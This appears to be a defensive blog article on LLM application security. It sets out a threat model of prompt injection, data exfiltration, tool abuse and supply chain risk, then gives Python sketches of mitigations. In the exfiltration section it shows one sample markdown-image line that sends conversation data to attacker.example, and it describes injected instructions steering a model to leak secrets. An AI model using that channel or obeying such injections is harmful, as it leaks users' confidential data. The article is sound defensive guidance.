PAVEL GLUKHIKH

LLM security: threats and defensive architecture

A practical LLM security threat model — prompt injection, data exfiltration, tool abuse, supply chain — and the defensive architecture that contains them.

Executive summary

LLM security is the practice of containing what an attacker can achieve through a language model application, because you cannot reliably prevent the model itself from being manipulated. The workable threat model has four pillars: prompt injection through any text the model reads, data exfiltration through any channel the model can write to, abuse of tools the model can invoke, and compromise of the model supply chain. This article maps each pillar to the OWASP Top 10 for LLM Applications and lays out the defensive architecture: trust-boundary design, least-privilege tool scopes, output mediation, and egress control. The organizing principle throughout is blast-radius reduction, not model alignment.

The uncomfortable truth about LLM security is that the component at the center of your application follows instructions found in data, and no amount of prompt engineering changes that reliably. A language model cannot cryptographically distinguish the developer’s instructions from instructions an attacker hid in paragraph six of a retrieved PDF. It reads text. It acts on text. That is the product.

Everything downstream of that fact is architecture.

So the discipline ends up looking less like hardening the model and more like security engineering we have done for decades: define trust boundaries, assume the component inside them can be subverted, and make subversion unprofitable. The reasoning that says a compromised workstation should never reach the database says a compromised context window should not reach one either. New principal, old playbook.

The threat model in four pillars

The OWASP Top 10 for LLM Applications is the standard catalog, and it is good. Use it in reviews. For architecture work I collapse it into four pillars, because the defenses group naturally this way and ten categories is too many to hold in your head during a design session.

1. Prompt injection (OWASP LLM01)

Any text the model reads can carry instructions. That includes the user’s message, which is direct injection, and it includes everything the application fetched on the user’s behalf: documents, web pages, emails, database fields, tool outputs. That second category, indirect injection, is the one that should keep architects up at night. RAG systems ingest untrusted content as a feature, and the victim is a user who asked an innocent question over a poisoned corpus.

Assume some injections succeed. Then ask the only design question that matters: what can a successful injection actually do? If the answer is “reword a summary,” you have a quality problem. If the answer is “call the refund API,” you built that vulnerability yourself, and no injection filter is coming to save you from it.

2. Data exfiltration (LLM02, LLM06 territory)

An injected model becomes an insider that will helpfully gather and leak whatever it can reach, through whatever channel it can write to. The classic pattern: injected instructions tell the model to summarize the conversation, secrets and retrieved confidential data included, into the URL parameter of a markdown image, ![x](https://attacker.example/?d=...), which the client dutifully renders. The data leaves in a GET request that looks like an image load.

Count the output channels and you have counted the exfil channels. Rendered markdown, tool arguments, emails the system can send, records it can write. Every one of them.

3. Tool abuse (excessive agency: LLM06 in the 2025 list, LLM08 in the 2023 list)

The moment a model can invoke tools, injection converts to action. The threat scales with the union of everything the tools can do with the credentials they hold, not with what the feature was supposed to do. A “read my calendar” assistant whose service account can also send mail is, to an attacker, a phishing platform with excellent grammar.
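One way to make that union visible in a design review is to compute it. The sketch below is illustrative only: the scope strings and the `excess_reach` helper are hypothetical names, not part of any real IAM product.

```python
def excess_reach(tool_scopes, required_scopes):
    """Return scopes the tools' credentials hold beyond what the feature needs.

    tool_scopes: dict mapping tool name -> set of scopes its credential holds.
    required_scopes: iterable of scopes the feature was designed to use.
    """
    # The attacker's reach is the union across every tool, not any single tool.
    reachable = set().union(*tool_scopes.values())
    return reachable - set(required_scopes)


# Hypothetical "read my calendar" assistant backed by an over-broad account.
assistant = {"read_calendar": {"calendar.read", "mail.send"}}
print(sorted(excess_reach(assistant, {"calendar.read"})))
```

Anything this returns is capability the feature never needed and an injection can still use.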

4. Supply chain (LLM03, LLM05)

Model weights, fine-tuning data, embeddings, vector stores, inference servers, and the fast-moving Python stack underneath. All of it is supply chain. Poisoned and trojaned weights are documented in MITRE ATLAS case studies; more mundane and more likely are malicious packages in the ML toolchain and unsafe deserialization in older model formats. Self-hosting moves this entire pillar from your provider’s problem to yours, a trade some teams make deliberately and others discover retroactively.

Defensive architecture

No single control below is sufficient, and anyone selling you one control as sufficient is selling. The set, applied together, is the current defensible standard of care per OWASP and NCSC guidance.

Draw the trust boundary around the context window

Treat everything entering the model as untrusted: user input, retrieved chunks, tool results. Treat everything leaving it as untrusted output, as tainted as a form field in a web app. In practice:

  • Mark provenance on every context segment so downstream logic knows which content came from where, and use structured message roles rather than concatenating strings into one undifferentiated prompt.
  • Never execute, render, or forward model output without mediation appropriate to the sink. HTML-escape it, validate tool arguments against schemas, strip or proxy URLs.
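
As a minimal sketch of mediation for one sink, rendered markdown, the function below replaces any image whose host is not allowlisted with its alt text. The allowlist contents and the function name are assumptions for illustration, and a regex is a deliberate simplification: it does not cover reference-style images or raw HTML, so a production version should sit on a real markdown parser.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts your UI is permitted to load images from.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

# Matches inline markdown images: ![alt](url) or ![alt](url "title").
_MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)')


def strip_untrusted_images(model_output):
    """Replace images pointing at non-allowlisted hosts with their alt text."""
    def _replace(match):
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # allowlisted: keep the image as written
        return f"[image removed: {alt}]"
    return _MD_IMAGE.sub(_replace, model_output)


print(strip_untrusted_images("Done. ![x](https://attacker.example/?d=secret)"))
```

With the image removed before rendering, the client never issues the GET request that would have carried the data out.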

We learned this lesson with SQL injection twenty years ago: the boundary between data and instructions has to be enforced by structure, not by hoping the data behaves. The industry is now relearning it with a component where the structure is probabilistic.
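
Provenance marking can be sketched as a small data structure that travels with every context segment. The role names below mirror common chat APIs but are assumptions, as are `Segment`, `to_messages`, and `has_third_party_content`. Nothing here makes the model itself respect the boundary. It only gives downstream logic something to enforce.

```python
from dataclasses import dataclass
from enum import Enum


class Source(Enum):
    DEVELOPER = "developer"
    USER = "user"
    RETRIEVED = "retrieved"
    TOOL = "tool"


@dataclass(frozen=True)
class Segment:
    source: Source
    origin: str  # e.g. a document ID or tool name
    text: str


# Hypothetical role mapping; adjust to whatever your model API expects.
ROLE_FOR = {
    Source.DEVELOPER: "system",
    Source.USER: "user",
    Source.RETRIEVED: "tool",
    Source.TOOL: "tool",
}


def to_messages(segments):
    """Build role-tagged messages instead of one concatenated prompt string."""
    return [
        {
            "role": ROLE_FOR[s.source],
            "provenance": {"source": s.source.value, "origin": s.origin},
            "content": s.text,
        }
        for s in segments
    ]


def has_third_party_content(segments):
    """True if any segment was fetched rather than written by developer or user."""
    return any(s.source in (Source.RETRIEVED, Source.TOOL) for s in segments)
```

One possible use: a policy layer that tightens tool access whenever `has_third_party_content` is true for the current request.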

Least-privilege, per-request tool scopes

This is the highest-value control in the set. It is identity-first security applied to a new kind of principal, and none of the mechanics are new.

Tools execute with the end user’s effective permissions, never a standing service account. If the user cannot delete the record, the model acting on their behalf cannot either. Scope credentials per request, short-lived, narrowest possible: the ticket-summarizer gets read on that ticket, not read on the ticketing system.
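
A rough sketch of the idea, assuming the caller's permissions are available as a set of (action, resource) pairs. In a real deployment the grant would be a token minted by your IdP rather than an in-process object. `ScopedGrant`, `mint_grant`, and `authorize` are hypothetical names.

```python
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class ScopedGrant:
    user_id: str
    action: str      # e.g. "read"
    resource: str    # e.g. "ticket:4821"
    expires_at: float


def mint_grant(user_id, user_permissions, action, resource,
               ttl_seconds=60, now=None):
    """Issue a grant only for something the end user may already do."""
    if (action, resource) not in user_permissions:
        raise PermissionError(f"{user_id} may not {action} {resource}")
    now = time.time() if now is None else now
    return ScopedGrant(user_id, action, resource, now + ttl_seconds)


def authorize(grant, action, resource, now=None):
    """Check a tool call against the grant: exact action, exact resource, unexpired."""
    now = time.time() if now is None else now
    return (grant.action == action
            and grant.resource == resource
            and now < grant.expires_at)
```

The ticket-summarizer would call `mint_grant(user, perms, "read", "ticket:4821")` once per request, and every tool call passes through `authorize` before it touches the ticketing system.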

Separate read tools from write tools, and put human-in-the-loop gates on irreversible or externally visible actions. One detail matters more than it looks: the approval screen must show the human the actual arguments, not a friendly paraphrase. A human who approves what the model says it will do, rather than what it is about to do, is part of the attack surface.
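
The gate can be sketched as follows. The tool names and the `approve` callback (whatever shows the prompt to a human and returns their decision) are assumptions. The point of the sketch is that the approval text is built from the arguments that will actually be sent, never from anything the model wrote about them.

```python
import json

# Hypothetical set of tools with irreversible or externally visible effects.
IRREVERSIBLE_TOOLS = {"send_email", "issue_refund"}


def render_approval_prompt(tool_name, arguments):
    """Format the exact call for the reviewer, byte-for-byte what will run."""
    payload = json.dumps(arguments, indent=2, sort_keys=True)
    return f"Tool: {tool_name}\nArguments:\n{payload}"


def execute_with_gate(tool_name, arguments, tools, approve):
    """Run a tool, requiring human approval first if it is irreversible.

    tools: dict mapping tool name -> callable.
    approve: callable taking the rendered prompt, returning True or False.
    """
    if tool_name in IRREVERSIBLE_TOOLS:
        if not approve(render_approval_prompt(tool_name, arguments)):
            return {"status": "rejected"}
    return {"status": "ok", "result": tools[tool_name](**arguments)}
```

Read-only tools skip the gate entirely, which keeps reviewer attention on the calls that cannot be undone.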

Control the egress channels

Exfiltration needs a writable channel. Enumerate them, then close them:

  • Disable or proxy remote image rendering in any UI that displays model output; allowlist outbound domains for any tool that fetches URLs.
  • Run inference and tool sandboxes in segmented network zones with explicit egress rules. A code-execution tool with open internet egress is an exfil primitive, full stop.
  • Log tool invocations and their arguments centrally. Injection that turns into action shows up here first, and at 2 AM this log is the difference between reconstructing an incident and narrating a guess.
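
For a URL-fetching tool, the allowlist and the audit log can live in the same wrapper. This is a sketch under assumptions: the host list, logger name, and `fetch` callable are placeholders, and an application-level check like this complements network egress rules rather than replacing them (it does nothing about redirects, for instance).

```python
import json
import logging
from urllib.parse import urlparse

logger = logging.getLogger("tool_audit")  # hypothetical central audit logger

# Hypothetical allowlist of hosts the fetch tool may reach.
ALLOWED_FETCH_HOSTS = {"docs.example.com"}


def is_fetch_allowed(url):
    """Allow only HTTPS requests to explicitly allowlisted hosts."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_FETCH_HOSTS


def audited_fetch(url, request_id, fetch):
    """Log the invocation with its arguments, then fetch only if allowed."""
    allowed = is_fetch_allowed(url)
    # Log before acting, so blocked attempts are recorded too.
    logger.info(json.dumps({
        "request_id": request_id,
        "tool": "fetch_url",
        "args": {"url": url},
        "allowed": allowed,
    }))
    if not allowed:
        raise PermissionError(f"egress to {url!r} is not allowlisted")
    return fetch(url)
```

Blocked attempts are often the most useful entries in that log, since they show an injection trying to turn into action.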

Constrain the blast radius of retrieval

For RAG systems: enforce the caller’s document permissions in the retriever, treat corpus write-access as a security boundary, and record which chunks entered each answer so a poisoned source can be traced and purged. Whoever can plant a document in your corpus can inject at scale, which makes your wiki’s edit permissions part of your attack surface. Few teams have thought about that sentence, and it shows in reviews. The full design is in RAG architecture for the enterprise.
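
A minimal sketch of the first and third controls, assuming each chunk carries the groups allowed to read its source document. `Chunk`, the group model, and the in-memory audit list are illustrative stand-ins for your index metadata and log store.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Chunk:
    chunk_id: str
    doc_id: str
    allowed_groups: frozenset
    text: str


def filter_by_permission(candidates, caller_groups):
    """Keep only chunks the caller could have opened directly."""
    return [c for c in candidates if c.allowed_groups & caller_groups]


def record_answer_sources(answer_id, chunks, audit_log):
    """Record which chunks entered an answer so a source can be traced later."""
    audit_log.append({
        "answer_id": answer_id,
        "chunks": [(c.doc_id, c.chunk_id) for c in chunks],
    })


def answers_touching(doc_id, audit_log):
    """List answers that used any chunk from a document found to be poisoned."""
    return [
        entry["answer_id"]
        for entry in audit_log
        if any(d == doc_id for d, _ in entry["chunks"])
    ]
```

The filter runs inside the retriever, before anything reaches the context window. Filtering after generation is too late, because the model has already read the text.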

Secure the model supply chain

  • Pull weights only from verified publishers, verify checksums, and prefer safetensors over pickle-based formats.
  • Pin and scan the inference stack like any other production dependency. It is one, with a worse-than-average CVE cadence.
  • Version and access-control fine-tuning datasets. Training data is code now, and poisoning it is a persistent backdoor that survives every redeploy.
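
Checksum verification is the easiest of these to automate. The sketch below uses only the standard library and assumes the expected digest comes from the publisher through a channel you trust. `verify_weights` is a hypothetical helper name.

```python
import hashlib
import hmac


def sha256_of_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so multi-gigabyte weights never load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def verify_weights(path, expected_sha256):
    """Raise ValueError if the file does not match the published digest."""
    actual = sha256_of_file(path)
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ValueError(f"checksum mismatch for {path}: got {actual}")
```

Run it before the loader ever opens the file. A mismatch should stop the deployment, not produce a warning.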

Detect, because prevention is probabilistic

Injection classifiers and heuristic filters in the gateway catch the casual attempts. Their more durable value is telemetry: they tell you who is probing, and how, before anything succeeds. Sampled production review, the same machinery as production evaluation, catches behavioral anomalies no signature ever will. Define in advance what constitutes an AI security incident and wire the thresholds into the same incident response process your infrastructure already uses. A new alert source, not a new discipline.
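
Wiring a threshold can be as simple as counting filter hits per principal over a sliding window. The numbers and the `ProbeMonitor` class below are placeholders for illustration. The real thresholds are whatever your incident definition says they are.

```python
from collections import defaultdict, deque


class ProbeMonitor:
    """Flag a principal whose injection-filter hits reach a threshold in a window."""

    def __init__(self, threshold=5, window_seconds=600.0):
        self.threshold = threshold
        self.window_seconds = window_seconds
        self._hits = defaultdict(deque)

    def record_hit(self, principal, timestamp):
        """Record one filter hit; return True if the principal should be escalated."""
        hits = self._hits[principal]
        hits.append(timestamp)
        # Drop hits that have aged out of the window.
        while hits and timestamp - hits[0] > self.window_seconds:
            hits.popleft()
        return len(hits) >= self.threshold
```

A `True` return would open a ticket in the existing incident process, the same way any other alert source does.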

Tradeoffs, honestly

| Control | Cost | Verdict |
| --- | --- | --- |
| Per-request scoped credentials | Real integration work with your IdP | Do it anyway; it is the control that caps everything else |
| HITL on writes | Latency, reviewer fatigue | Only on irreversible actions; measure override rates |
| Egress allowlisting | Breaks legitimate fetches occasionally | Cheap insurance; exceptions via review |
| Injection filters | False positives, arms race | Useful telemetry; never the load-bearing control |
| Output sanitization | Engineering effort per sink | Non-negotiable for rendered or executed output |

What to write down

For each LLM application, record four things: the trust boundary diagram, showing every content source entering the context and every sink receiving output; the tool manifest, with the exact scope each tool holds and why; the egress inventory for model-controlled channels; and the incident thresholds that trigger escalation. A reviewer holding those four artifacts can find your real exposure in an hour.

So can you. That is the point.

Security here is not about trusting the model less. It is about needing to trust it less, because the architecture never handed it more reach than the task required. That principle predates language models by decades, and it will outlast whatever replaces them.

Frequently asked questions

Can prompt injection be fully prevented?
No. There is currently no reliable way to guarantee a model will ignore instructions embedded in content it processes. Injection resistance keeps improving, but it is probabilistic, not absolute. Sound LLM security therefore assumes some injections succeed and designs so that a successful one finds nothing valuable to steal and no dangerous tool to trigger. Filters and detection reduce the frequency. Architecture caps the impact, and only architecture does.

What is indirect prompt injection?
Indirect injection is when the malicious instruction arrives not in the user's own message but in content the application fetches on the user's behalf: a retrieved document, a web page, an email, a tool result. It is the more dangerous variant, because the victim did nothing wrong, and because retrieval-augmented systems ingest exactly this kind of untrusted content by design. The user asked an innocent question; the corpus answered with an attack.

Is the OWASP Top 10 for LLM Applications worth using?
Yes, as shared vocabulary and a review checklist. It names the failure classes (prompt injection, sensitive information disclosure, supply chain, excessive agency, and the rest) clearly enough to structure a threat-modeling session with people who have never done one. It is not a control framework; the architecture is still on you. I use it the way I use the classic OWASP Top 10: to make sure a review missed nothing obvious.

Do self-hosted models remove LLM security risks?
They remove one category and add another. You shed provider-side data handling concerns, and you pick up the model supply chain: weight provenance, inference-stack CVEs, GPU infrastructure hardening, all now yours. Injection, exfiltration, and tool abuse are completely unchanged, because they are properties of the application architecture, not of where the model happens to run. Where you host decides who holds which risks, not how many exist.
